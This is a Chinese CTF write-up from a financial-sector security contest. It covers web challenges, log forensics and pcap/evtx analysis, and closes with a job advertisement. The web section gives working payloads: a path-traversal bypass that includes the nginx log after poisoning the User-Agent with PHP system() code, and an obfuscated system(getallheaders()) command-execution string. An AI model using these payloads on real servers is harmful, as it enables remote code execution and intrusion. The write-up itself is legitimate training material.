金融业-数字化转型大赛-网络安全赛道部分wp

web

签到

二维码被分割，需要拼接扫描。

离线二维码识别工具：QR_Research

check this

<?php
    ini_set('display_errors', '0');

    function containsStr($str, $substr) {
        return strpos($str, $substr) !== false;
    }


    if(isset($_GET["view"])){
        if (containsStr($_GET['view'], '../..')){
            return;
        }
    
        if(containsStr($_GET['view'], '/var/www/html/') && !containsStr($_GET['view'], 'flag.php')) {
                include($_GET['view']);
        }else{
            echo 'Sorry, Thats not allowed';
        }
}
?>

最大的坑点：触发点是 test.php
根据给出的代码
考点一：../.. 的绕过，.././.././ 可以绕过
考点二：view参数需要有 /var/www/html/ 但是不能包含flag.php , 最后想到通过 nignx 日志文件进行命令执行；

最后构造的payload 为：test.php?view=/var/www/html/.././.././.././.././.././.././var/log/nginx/acceess.log
同时修改UA 例如：

<?php system('ls');?>

最终 cat flag.php 就能得到。(F12看源代码才行。。。)

PHP_RCE

这个题有点难，过滤的太多了。。。
思路参考的是这个，采用或方法：

https://blog.csdn.net/miuzzx/article/details/109143413?ops_request_misc=%257B%2522request%255Fid%2522%253A%25223a3b1e71983bc6c03fb7c36d77b93344%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=3a3b1e71983bc6c03fb7c36d77b93344&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-109143413-null-null.nonecase&utm_term=%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F&spm=1018.2226.3001.4450

比完后，问了别人的payload。?cmd=((rystem|qystem))((eld|ejd)((fetadlhdaders|eetahlhaaders)())); 构造出system getallheaders();
然后在请求头，构造命令，最终 cat /flag

之前从来没接触过这个知识点，涨知识了。

misc

access.log

打开文件，一眼就能看出sql注入。实用正则(sublime)匹配出请求包，找到正确响应(1280)的请求,可以得到aes_iv, aes_key , 解密 password 就能得到flag。

因为不熟悉，最终在cyberchef解密那里卡了一会。 iv 和 key是utf8 ， input是hex。

应急响应

pcap包分析2

过滤http包，在最后能看到 /files.. 的路径穿越。 定位到这里了，应该很轻松就找到了读取的第二个文件。 md5 后就行。

rdp登出日志

没接触过evtx格式，也看不懂。好在第一个rdp.evtx的包不多，包含IP的不多。把IP全提取出来，最后也就三个，192.168.50.59是对的。另外一个文件就没看了。

有知道的大佬 求教，后来在网上也没找到好的解法

以上是自己学到的内容，如果有大哥对其他题目感兴趣的可以私聊。

另：目前就职的一个甲方单位，有没有同等大哥愿意日常沟通交流(求大哥带带)。

ps单位也招攻防人员, 有点卡学历和经历。硬要求：研究生 软：有攻防、ctf经验；最好95后。